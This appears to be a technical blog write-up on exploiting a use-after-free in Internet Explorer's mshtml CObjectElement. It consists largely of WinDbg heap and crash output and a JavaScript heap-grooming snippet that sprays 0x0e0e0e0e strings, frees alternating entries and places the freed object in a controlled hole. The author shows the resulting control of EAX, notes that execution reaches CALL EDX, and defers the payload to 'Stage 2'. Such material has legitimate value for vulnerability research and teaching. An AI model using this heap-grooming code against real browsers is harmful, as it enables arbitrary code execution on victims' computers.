eip=6dbd47b9 esp=021fc5d8 ebp=021fc5f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTreeNode::CTreeNode:
6dbd47b9 8bff mov edi,edi


dc 00450080

00450080 00000000 00000000 00000000 00000000 ................


ba w4 00450080


dc 00450080

00450080 028a4f80 00000000 ffff0000 ffffffff .O..............


!heap -x 028a4f80

Entry User Heap Segment Size PrevSize Unused Flags

-----------------------------------------------------

028a4f78 028a4f80 003d0000 00450d68 e8 - 8 LFH;busy


dt nt!_heap_subsegment 00450d68


ntdll!_HEAP_SUBSEGMENT
 
+0x000 LocalInfo : 0x003d76c0 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x028a2048 _HEAP_USERDATA_HEADER 
+0x008 AggregateExchg : _INTERLOCK_SEQ 
+0x010 BlockSize : 0x1d 
+0x012 Flags : 0 
+0x014 BlockCount : 0x46 
+0x016 SizeIndex : 0x1c '' 
+0x017 AffinityIndex : 0 '' 
+0x010 Alignment : [2] 0x1d 
+0x018 SFreeListEntry : _SINGLE_LIST_ENTRY 
+0x01c Lock : 7

dt nt!_INTERLOCK_SEQ 00450d68+8

ntdll!_INTERLOCK_SEQ
 
+0x000 Depth : 0x11 
+0x002 FreeEntryOffset : 0x603 
+0x000 OffsetAndDepth : 0x6030011  
+0x004 Sequence : 0xff425ade 
+0x000 Exchg : 0n-53380335944925167

dt nt!_HEAP_LOCAL_SEGMENT_INFO 0x003d76c0

ntdll!_HEAP_LOCAL_SEGMENT_INFO
 
+0x000 Hint : (null) 
+0x004 ActiveSubsegment : 0x00450d68 _HEAP_SUBSEGMENT 
+0x008 CachedItems : [16] (null) 
+0x048 SListHeader : _SLIST_HEADER 
+0x050 Counters : _HEAP_BUCKET_COUNTERS 
+0x058 LocalData : 0x003d6b48 _HEAP_LOCAL_DATA 
+0x05c LastOpSequence : 0x87 
+0x060 BucketIndex : 0x1c 
+0x062 LastUsed : 0


The allocation of the CObjectElement is being retrieved from the active sub-segment.
Can we build up on the better of the two worlds? I think we can, freeing strings will increase our chances of heap cache usage, and as freeing a string does not alter its content, we’ll allocate a full segment and then free a portion of it, by de-allocating a couple of even/odd indexed strings from the array. This will leave the heap in the following state:

When IE allocates the CObjectElement it will end up in one of these holes, surrounded by 0x0e0e0e0e strings.

The code:

  var size1 = (0xe0/2)-3;
  var arrSize1 = 2000;
  var obj_overwrite2 = unescape("%u0e0e");
  while(obj_overwrite2.length < size1)
    { obj_overwrite2 += obj_overwrite2; } 
  obj_overwrite2 = obj_overwrite2.substr(0, size1);
  var arr2 = new Array();
  for(var counter1 = 0; counter1 < arrSize1; counter1++)
    { arr2[counter1] = obj_overwrite2.substr(0, size1); } 
  for(var counter1 = arrSize1-100; counter1 < arrSize1; counter1+=2)
    { 
      delete arr2[counter1]; 
      arr2[counter1] = null; 
    } 
  CollectGarbage();
  document.body.innerHTML += "<object align='right' width='1000'>TAG_1</object>"; 
...

ModLoad: 6e010000 6e0c2000 C:\Windows\System32\jscript.dll

(920.e14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0e0e0e0e ebx=00126d18 ecx=01d40115 edx=00000000 esi=022bbc00 edi=00000000
eip=6c64b68f esp=022bbbd4 ebp=022bbbec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6c64b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0e0e0e7e=????????


dc ebx
00126d18
01d40115 00000000 ffff404a ffffffff ........J@......

dc
01d40115
01d40115
0e0e0e0e 0e0e0e0e 0e0e0e0e 0e0e0e0e ................

!heap -x 01d40115

Entry User Heap Segment Size PrevSize Unused Flags

----------------------------------------------------

01d400d8
01d400e0 00070000 0010e408 e8 - 8 LFH;busy




!heap -flt s e0 
_HEAP @ 70000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state  
01d400d8 001d 001d [00] 01d400e0 000e0 - (busy) 
01d401c0 001d 001d [00] 01d401c8 000e0 - (busy) 
01d402a8 001d 001d [00] 01d402b0 000e0 - (busy) 
01d40390 001d 001d [00] 01d40398 000e0 - (busy) 
01d40478 001d 001d [00] 01d40480 000e0 - (busy) 
01d40560 001d 001d [00] 01d40568 000e0 - (busy)
...

01d48a20 001d 001d [00] 01d48a28 000e0 - (busy) 
01d48b08 001d 001d [00] 01d48b10 000e0 - (busy)
...
 
01d4f7c8 001d 001d [00] 01d4f7d0 000e0 - (busy) 
01d4f8b0 001d 001d [00] 01d4f8b8 000e0 - (free)  
01d4f998 001d 001d [00] 01d4f9a0 000e0 - (busy) 
01d4fa80 001d 001d [00] 01d4fa88 000e0 - (free) 
01d4fb68 001d 001d [00] 01d4fb70 000e0 - (busy) 
01d4fc50 001d 001d [00] 01d4fc58 000e0 - (free) 
01d4fd38 001d 001d [00] 01d4fd40 000e0 - (busy) 
01d4fe20 001d 001d [00] 01d4fe28 000e0 - (free)  
01d4ff08 001d 001d [00] 01d4ff10 000e0 - (busy) 
01d4fff0 001d 001d [00] 01d4fff8 000e0 - (free)

dt ntdll!_HEAP_SUBSEGMENT 0010e408
 
+0x000 LocalInfo : 0x000776c0 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x01d38a10 _HEAP_USERDATA_HEADER
 
+0x008 AggregateExchg : _INTERLOCK_SEQ 
+0x010 BlockSize : 0x1d 
+0x012 Flags : 0 
+0x014 BlockCount : 0x8d 
+0x016 SizeIndex : 0x1c '' 
+0x017 AffinityIndex : 0 '' 
+0x010 Alignment : [2] 0x1d 
+0x018 SFreeListEntry : _SINGLE_LIST_ENTRY 
+0x01c Lock : 1

As you can see from above, the full address space covered by the base address 0x1d4XXXX is filled with our string content. Although this is no guarantee of a working exploit, this greatly extends the probability of exploitation success. So, EAX is now 0x0e0e0e0e, EDX will have [0x0e0e0e0e+70].

As the next instruction in the execution stream is: CALL EDX then you know where we’re going from here… Stage 2.

I hope you have enjoyed.

Tudo é possivel, quando o homem quer (e a mulher permite).